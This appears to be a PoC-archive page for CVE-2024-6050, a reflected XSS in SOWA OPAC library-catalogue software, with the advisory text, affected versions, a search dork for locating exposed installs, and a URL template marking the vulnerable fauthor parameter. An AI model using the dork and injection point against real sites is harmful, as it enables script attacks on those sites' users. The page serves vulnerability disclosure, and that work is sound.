Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-6050 PoC — Reflected XSS in SOWA OPAC

Source
Associated Vulnerability
Title:Reflected XSS in SOWA OPAC (CVE-2024-6050)
Description:Improper Neutralization of Input During Web Page Generation vulnerability in SOKRATES-software SOWA OPAC allows a Reflected Cross-Site Scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. This issue affects SOWA OPAC software in versions from 4.0 before 4.9.10, from 5.0 before 6.2.12.
Description
Reflected XSS in SOWA OPAC
Readme
# CVE-2024-6050
Reflected XSS in SOWA OPAC
Version: from 4.0 before 4.9.10, from 5.0 before 6.2.12.
`intext:"SOWA OPAC v."`

## PoC

```
https://[domain]/index.php?KatID=0&typ=repl&plnk=q__*&fauthor=[XSS]
```
File Snapshot

[4.0K] /data/pocs/d1b41f64ebcd4e36fc45e036db0bb72ddb5fe59e └── [ 209] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →